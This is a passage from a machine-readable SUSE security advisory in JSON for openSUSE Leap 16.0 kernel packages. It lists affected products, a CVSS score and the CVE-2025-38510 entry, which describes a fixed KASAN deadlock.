"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38507"
},
{
"cve": "CVE-2025-38510",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38510"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nkasan: remove kasan_find_vm_area() to prevent possible deadlock\n\nfind_vm_area() couldn\u0027t be called in atomic_context. If find_vm_area() is\ncalled to reports vm area information, kasan can trigger deadlock like:\n\nCPU0 CPU1\nvmalloc();\n alloc_vmap_area();\n spin_lock(\u0026vn-\u003ebusy.lock)\n spin_lock_bh(\u0026some_lock);\n \u003cinterrupt occurs\u003e\n \u003cin softirq\u003e\n spin_lock(\u0026some_lock);\n \u003caccess invalid address\u003e\n kasan_report();\n print_report();\n print_address_description();\n kasan_find_vm_area();\n find_vm_area();\n spin_lock(\u0026vn-\u003ebusy.lock) // deadlock!\n\nTo prevent possible deadlock while kasan reports, remove kasan_find_vm_area().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38510",
"url": "https://www.suse.com/security/cve/CVE-2025-38510"
},
{
"category": "external",
"summary": "SUSE Bug 1248166 for CVE-2025-38510",
"url": "https://bugzilla.suse.com/1248166"
}
],
"remediations": [
{
"category": "vendor_fix",
